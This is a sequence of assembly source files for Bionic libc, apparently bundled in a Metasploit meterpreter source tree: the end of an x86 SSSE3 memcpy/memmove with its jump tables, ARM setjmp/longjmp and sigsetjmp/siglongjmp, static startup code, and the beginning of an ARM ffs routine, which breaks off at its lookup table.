#endif
RETURN
ALIGN (4)
L(bk_write_45bytes):
movl 41(%eax), %ecx
movl %ecx, 41(%edx)
L(bk_write_41bytes):
movl 37(%eax), %ecx
movl %ecx, 37(%edx)
L(bk_write_37bytes):
movl 33(%eax), %ecx
movl %ecx, 33(%edx)
L(bk_write_33bytes):
movl 29(%eax), %ecx
movl %ecx, 29(%edx)
L(bk_write_29bytes):
movl 25(%eax), %ecx
movl %ecx, 25(%edx)
L(bk_write_25bytes):
movl 21(%eax), %ecx
movl %ecx, 21(%edx)
L(bk_write_21bytes):
movl 17(%eax), %ecx
movl %ecx, 17(%edx)
L(bk_write_17bytes):
movl 13(%eax), %ecx
movl %ecx, 13(%edx)
L(bk_write_13bytes):
movl 9(%eax), %ecx
movl %ecx, 9(%edx)
L(bk_write_9bytes):
movl 5(%eax), %ecx
movl %ecx, 5(%edx)
L(bk_write_5bytes):
movl 1(%eax), %ecx
movl %ecx, 1(%edx)
L(bk_write_1bytes):
movzbl (%eax), %ecx
movb %cl, (%edx)
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
#endif
RETURN
ALIGN (4)
L(bk_write_46bytes):
movl 42(%eax), %ecx
movl %ecx, 42(%edx)
L(bk_write_42bytes):
movl 38(%eax), %ecx
movl %ecx, 38(%edx)
L(bk_write_38bytes):
movl 34(%eax), %ecx
movl %ecx, 34(%edx)
L(bk_write_34bytes):
movl 30(%eax), %ecx
movl %ecx, 30(%edx)
L(bk_write_30bytes):
movl 26(%eax), %ecx
movl %ecx, 26(%edx)
L(bk_write_26bytes):
movl 22(%eax), %ecx
movl %ecx, 22(%edx)
L(bk_write_22bytes):
movl 18(%eax), %ecx
movl %ecx, 18(%edx)
L(bk_write_18bytes):
movl 14(%eax), %ecx
movl %ecx, 14(%edx)
L(bk_write_14bytes):
movl 10(%eax), %ecx
movl %ecx, 10(%edx)
L(bk_write_10bytes):
movl 6(%eax), %ecx
movl %ecx, 6(%edx)
L(bk_write_6bytes):
movl 2(%eax), %ecx
movl %ecx, 2(%edx)
L(bk_write_2bytes):
movzwl (%eax), %ecx
movw %cx, (%edx)
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
#endif
RETURN
ALIGN (4)
L(bk_write_47bytes):
movl 43(%eax), %ecx
movl %ecx, 43(%edx)
L(bk_write_43bytes):
movl 39(%eax), %ecx
movl %ecx, 39(%edx)
L(bk_write_39bytes):
movl 35(%eax), %ecx
movl %ecx, 35(%edx)
L(bk_write_35bytes):
movl 31(%eax), %ecx
movl %ecx, 31(%edx)
L(bk_write_31bytes):
movl 27(%eax), %ecx
movl %ecx, 27(%edx)
L(bk_write_27bytes):
movl 23(%eax), %ecx
movl %ecx, 23(%edx)
L(bk_write_23bytes):
movl 19(%eax), %ecx
movl %ecx, 19(%edx)
L(bk_write_19bytes):
movl 15(%eax), %ecx
movl %ecx, 15(%edx)
L(bk_write_15bytes):
movl 11(%eax), %ecx
movl %ecx, 11(%edx)
L(bk_write_11bytes):
movl 7(%eax), %ecx
movl %ecx, 7(%edx)
L(bk_write_7bytes):
movl 3(%eax), %ecx
movl %ecx, 3(%edx)
L(bk_write_3bytes):
movzwl 1(%eax), %ecx
movw %cx, 1(%edx)
movzbl (%eax), %eax
movb %al, (%edx)
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
#endif
RETURN_END
.pushsection .rodata.ssse3,"a",@progbits
ALIGN (2)
L(table_48bytes_fwd):
.int JMPTBL (L(fwd_write_0bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_1bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_2bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_3bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_4bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_5bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_6bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_7bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_8bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_9bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_10bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_11bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_12bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_13bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_14bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_15bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_16bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_17bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_18bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_19bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_20bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_21bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_22bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_23bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_24bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_25bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_26bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_27bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_28bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_29bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_30bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_31bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_32bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_33bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_34bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_35bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_36bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_37bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_38bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_39bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_40bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_41bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_42bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_43bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_44bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_45bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_46bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_47bytes), L(table_48bytes_fwd))
ALIGN (2)
L(shl_table):
.int JMPTBL (L(shl_0), L(shl_table))
.int JMPTBL (L(shl_1), L(shl_table))
.int JMPTBL (L(shl_2), L(shl_table))
.int JMPTBL (L(shl_3), L(shl_table))
.int JMPTBL (L(shl_4), L(shl_table))
.int JMPTBL (L(shl_5), L(shl_table))
.int JMPTBL (L(shl_6), L(shl_table))
.int JMPTBL (L(shl_7), L(shl_table))
.int JMPTBL (L(shl_8), L(shl_table))
.int JMPTBL (L(shl_9), L(shl_table))
.int JMPTBL (L(shl_10), L(shl_table))
.int JMPTBL (L(shl_11), L(shl_table))
.int JMPTBL (L(shl_12), L(shl_table))
.int JMPTBL (L(shl_13), L(shl_table))
.int JMPTBL (L(shl_14), L(shl_table))
.int JMPTBL (L(shl_15), L(shl_table))
ALIGN (2)
L(table_48_bytes_bwd):
.int JMPTBL (L(bk_write_0bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_1bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_2bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_3bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_4bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_5bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_6bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_7bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_8bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_9bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_10bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_11bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_12bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_13bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_14bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_15bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_16bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_17bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_18bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_19bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_20bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_21bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_22bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_23bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_24bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_25bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_26bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_27bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_28bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_29bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_30bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_31bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_32bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_33bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_34bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_35bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_36bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_37bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_38bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_39bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_40bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_41bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_42bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_43bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_44bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_45bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_46bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_47bytes), L(table_48_bytes_bwd))
.popsection
#ifdef USE_AS_MEMMOVE
	ALIGN (4)
/*
 * memmove backward copy for overlapping regions.  On entry (as used
 * below): %eax = src, %edx = dst, %ecx = length.  Both pointers are
 * first moved to one-past-the-end, then the copy proceeds from high
 * addresses to low.
 */
L(copy_backward):
	PUSH (%esi)
	movl	%eax, %esi
	lea	(%ecx,%edx,1),%edx	/* %edx = dst + len (end pointer) */
	lea	(%ecx,%esi,1),%esi	/* %esi = src + len (end pointer) */
	testl	$0x3, %edx
	jnz	L(bk_align)		/* 4-byte align the dst end pointer first */
L(bk_aligned_4):
	cmp	$64, %ecx
	jae	L(bk_write_more64bytes)
L(bk_write_64bytesless):
	cmp	$32, %ecx
	jb	L(bk_write_less32bytes)
L(bk_write_more32bytes):
	/* Copy 32 bytes at a time, highest dword first.  */
	sub	$32, %ecx
	movl	-4(%esi), %eax
	movl	%eax, -4(%edx)
	movl	-8(%esi), %eax
	movl	%eax, -8(%edx)
	movl	-12(%esi), %eax
	movl	%eax, -12(%edx)
	movl	-16(%esi), %eax
	movl	%eax, -16(%edx)
	movl	-20(%esi), %eax
	movl	%eax, -20(%edx)
	movl	-24(%esi), %eax
	movl	%eax, -24(%edx)
	movl	-28(%esi), %eax
	movl	%eax, -28(%edx)
	movl	-32(%esi), %eax
	movl	%eax, -32(%edx)
	sub	$32, %edx
	sub	$32, %esi
L(bk_write_less32bytes):
	/* Step both end pointers below the remaining tail and dispatch
	   to the unrolled backward writers.  */
	movl	%esi, %eax
	sub	%ecx, %edx
	sub	%ecx, %eax
	POP (%esi)
L(bk_write_less32bytes_2):
	BRANCH_TO_JMPTBL_ENTRY (L(table_48_bytes_bwd), %ecx, 4)
	ALIGN (4)
L(bk_align):
	cmp	$8, %ecx
	jbe	L(bk_write_less32bytes)
	testl	$1, %edx
	/* We get here only if (EDX & 3) != 0, so if (EDX & 1) == 0
	   then (EDX & 2) must be != 0.  */
	jz	L(bk_got2)
	/* Move one byte to make the dst end pointer even.  */
	sub	$1, %esi
	sub	$1, %ecx
	sub	$1, %edx
	movzbl	(%esi), %eax
	movb	%al, (%edx)
	testl	$2, %edx
	jz	L(bk_aligned_4)
L(bk_got2):
	/* Move one word to reach 4-byte alignment.  */
	sub	$2, %esi
	sub	$2, %ecx
	sub	$2, %edx
	movzwl	(%esi), %eax
	movw	%ax, (%edx)
	jmp	L(bk_aligned_4)
	ALIGN (4)
L(bk_write_more64bytes):
	/* Check alignment of last byte.  */
	testl	$15, %edx
	jz	L(bk_ssse3_cpy_pre)
/* EDX is aligned 4 bytes, but not 16 bytes.  Move up to three dwords
   to reach 16-byte alignment of the dst end pointer.  */
L(bk_ssse3_align):
	sub	$4, %esi
	sub	$4, %ecx
	sub	$4, %edx
	movl	(%esi), %eax
	movl	%eax, (%edx)
	testl	$15, %edx
	jz	L(bk_ssse3_cpy_pre)
	sub	$4, %esi
	sub	$4, %ecx
	sub	$4, %edx
	movl	(%esi), %eax
	movl	%eax, (%edx)
	testl	$15, %edx
	jz	L(bk_ssse3_cpy_pre)
	sub	$4, %esi
	sub	$4, %ecx
	sub	$4, %edx
	movl	(%esi), %eax
	movl	%eax, (%edx)
L(bk_ssse3_cpy_pre):
	cmp	$64, %ecx
	jb	L(bk_write_more32bytes)
/* Main backward loop: 64 bytes per pass, unaligned loads from src,
   aligned stores to the (now 16-aligned) dst, highest chunk first.  */
L(bk_ssse3_cpy):
	sub	$64, %esi
	sub	$64, %ecx
	sub	$64, %edx
	movdqu	0x30(%esi), %xmm3
	movdqa	%xmm3, 0x30(%edx)
	movdqu	0x20(%esi), %xmm2
	movdqa	%xmm2, 0x20(%edx)
	movdqu	0x10(%esi), %xmm1
	movdqa	%xmm1, 0x10(%edx)
	movdqu	(%esi), %xmm0
	movdqa	%xmm0, (%edx)
	cmp	$64, %ecx
	jae	L(bk_ssse3_cpy)
	jmp	L(bk_write_64bytesless)
#endif
END (MEMCPY)
|
OpenWireSec/metasploit | 3,680 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/setjmp.S | /* $OpenBSD: setjmp.S,v 1.2 2004/02/01 05:40:52 drahn Exp $ */
/* $NetBSD: setjmp.S,v 1.5 2003/04/05 23:08:51 bjh21 Exp $ */
/*
* Copyright (c) 1997 Mark Brinicombe
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by Mark Brinicombe
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- setjmp, longjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
/*
 * int setjmp(jmp_buf env)
 *
 * Saves the current signal mask, the FP state (unless SOFTFLOAT) and
 * registers r4-r14 into env, then returns 0.  A later longjmp(env, v)
 * restores this state and makes this call appear to return v (never 0).
 *
 * In:  r0 = env (jmp_buf pointer)
 * Out: r0 = 0 on the direct return path
 */
ENTRY(setjmp)
/* sigblock(0) adds no signals to the mask; it simply returns the
 * current signal mask.  r0 and lr are live across the call, save them. */
stmfd sp!, {r0, r14}
mov r0, #0x00000000
bl PIC_SYM(_C_LABEL(sigblock), PLT)
mov r1, r0
ldmfd sp!, {r0, r14}
/* Store signal mask in slot 25 of the jmp_buf */
str r1, [r0, #(25 * 4)]
/* Tag slot 0 with the setjmp magic number; longjmp checks it */
ldr r1, .Lsetjmp_magic
str r1, [r0], #4
#ifdef SOFTFLOAT
/* No hardware FP: skip over the 52 bytes reserved for FP state */
add r0, r0, #52
#else
/* Store fp registers f4..f7 (4 regs, 48 bytes, post-incrementing r0) */
sfm f4, 4, [r0], #48
/* Store fpsr */
rfs r1
str r1, [r0], #0x0004
#endif /*SOFTFLOAT*/
/* Store integer registers r4-r14 (callee-saved set plus sp and lr) */
stmia r0, {r4-r14}
mov r0, #0x00000000
bx lr
.Lsetjmp_magic:
.word _JB_MAGIC_SETJMP
/*
 * void longjmp(jmp_buf env, int val)
 *
 * Restores the state saved by setjmp(env) and returns val from that
 * setjmp call site (val == 0 is forced to 1 per the C standard).
 * Calls longjmperror()/abort() if the buffer fails validation.
 *
 * In:  r0 = env, r1 = val
 */
ENTRY(longjmp)
/* Validate the magic number written by setjmp() at env[0] */
ldr r2, .Lsetjmp_magic
ldr r3, [r0]
teq r2, r3
bne botch
/* Fetch signal mask (slot 25, matching setjmp above) */
ldr r2, [r0, #(25 * 4)]
/* Set signal mask */
stmfd sp!, {r0, r1, r14}
sub sp, sp, #4 /* align the stack */
mov r0, r2
bl PIC_SYM(_C_LABEL(sigsetmask), PLT)
add sp, sp, #4 /* unalign the stack */
ldmfd sp!, {r0, r1, r14}
/* Skip over the magic word */
add r0, r0, #4
#ifdef SOFTFLOAT
/* No hardware FP: skip the 52 bytes reserved for FP state */
add r0, r0, #52
#else
/* Restore fp registers f4..f7 */
lfm f4, 4, [r0], #48
/* Restore FPSR */
ldr r4, [r0], #0x0004
wfs r4
#endif /* SOFTFLOAT */
/* Restore integer registers (including sp and r14) */
ldmia r0, {r4-r14}
/* Validate sp and r14 */
teq sp, #0
teqne r14, #0
beq botch
/* Set return value; longjmp must never return 0 */
mov r0, r1
teq r0, #0x00000000
moveq r0, #0x00000001
bx lr
#ifdef __ARM_26__
/* NOTE(review): unreachable - the unconditional 'bx lr' above already
 * returned.  Looks like a leftover 26-bit-mode return sequence that
 * should have replaced the bx; confirm before removing. */
mov r15, r14
#else
mov r15, r14
#endif
/* validation failed, die die die. */
botch:
bl PIC_SYM(_C_LABEL(longjmperror), PLT)
bl PIC_SYM(_C_LABEL(abort), PLT)
b . - 8 /* Cannot get here */
|
OpenWireSec/metasploit | 2,438 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/sigsetjmp.S | /* $OpenBSD: sigsetjmp.S,v 1.2 2004/02/01 05:40:52 drahn Exp $ */
/* $NetBSD: sigsetjmp.S,v 1.3 2002/08/17 19:54:30 thorpej Exp $ */
/*
* Copyright (c) 1997 Mark Brinicombe
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by Mark Brinicombe
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- sigsetjmp, siglongjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a, m)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
/*
 * int sigsetjmp(sigjmp_buf env, int savesigs)
 *
 * Dispatcher: savesigs == 0 -> _setjmp (signal mask not saved),
 * otherwise -> setjmp (mask saved).  Both are tail branches, so the
 * callee returns directly to our caller.
 * In: r0 = env, r1 = savesigs
 */
ENTRY(sigsetjmp)
teq r1, #0
beq PIC_SYM(_C_LABEL(_setjmp), PLT)
b PIC_SYM(_C_LABEL(setjmp), PLT)
/* Magic value _setjmp() stores at env[0]; siglongjmp below compares
 * against it to pick the matching longjmp flavour. */
.L_setjmp_magic:
.word _JB_MAGIC__SETJMP
/*
 * void siglongjmp(sigjmp_buf env, int val)
 *
 * Inspects env[0]: if it carries the _setjmp magic the buffer was
 * written by _setjmp, so tail-branch to _longjmp; otherwise to longjmp.
 * In: r0 = env, r1 = val
 */
ENTRY(siglongjmp)
ldr r2, .L_setjmp_magic
ldr r3, [r0]
teq r2, r3
beq PIC_SYM(_C_LABEL(_longjmp), PLT)
b PIC_SYM(_C_LABEL(longjmp), PLT)
|
OpenWireSec/metasploit | 2,643 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtbegin_static.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is statically-linked with Bionic
# runs.
#
# its purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
/* r0 = address of the raw argument block the kernel left on the stack */
mov r0, sp
/* r1 = "onexit" callback; unused, pass NULL */
mov r1, #0
/* r2 = trampoline that branches to main (relocated before this runs) */
adr r2, 0f
/* r3 = address of the structors vector laid out just below */
adr r3, 1f
b __libc_init
0: b main
/* Vector of the four structor-array addresses handed to __libc_init */
1: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 3,222 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/ffs.S | /* $NetBSD: ffs.S,v 1.5 2003/04/05 23:08:52 bjh21 Exp $ */
/*
* Copyright (c) 2001 Christopher Gilbert
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the company nor the name of the author may be used to
* endorse or promote products derived from this software without specific
* prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* ffs - find first set bit, this algorithm isolates the first set
* bit, then multiplies the number by 0x0450fbaf which leaves the top
* 6 bits as an index into the table. This algorithm should be a win
* over the checking each bit in turn as per the C compiled version.
*
* under ARMv5 there's an instruction called CLZ (count leading Zero's) that
* could be used
*
* This is the ffs algorithm devised by d.seal and posted to comp.sys.arm on
* 16 Feb 1994.
*/
/*
 * int ffs(int mask)
 *
 * Returns the 1-based index of the least significant set bit of r0,
 * or 0 if r0 == 0.  Pre-ARMv5: isolate the bottom bit, multiply by
 * 0x0450fbaf (via shifts/adds) and use the top 6 bits as a table
 * index.  ARMv5+: use CLZ.
 */
ENTRY(ffs)
/* Standard trick to isolate bottom bit in r0 or 0 if r0 = 0 on entry */
rsb r1, r0, #0
ands r0, r0, r1
#ifndef __ARM_ARCH_5__
/*
 * now r0 has at most one set bit, call this X
 * if X = 0, all further instructions are skipped
 */
adrne r2, .L_ffs_table
orrne r0, r0, r0, lsl #4 /* r0 = X * 0x11 */
orrne r0, r0, r0, lsl #6 /* r0 = X * 0x451 */
rsbne r0, r0, r0, lsl #16 /* r0 = X * 0x0450fbaf */
/* now lookup in table indexed on top 6 bits of r0 */
ldrneb r0, [ r2, r0, lsr #26 ]
/* r0 is the table result, or still 0 when the input was 0 */
bx lr
.text;
.type .L_ffs_table, _ASM_TYPE_OBJECT;
.L_ffs_table:
/* 0 1 2 3 4 5 6 7 */
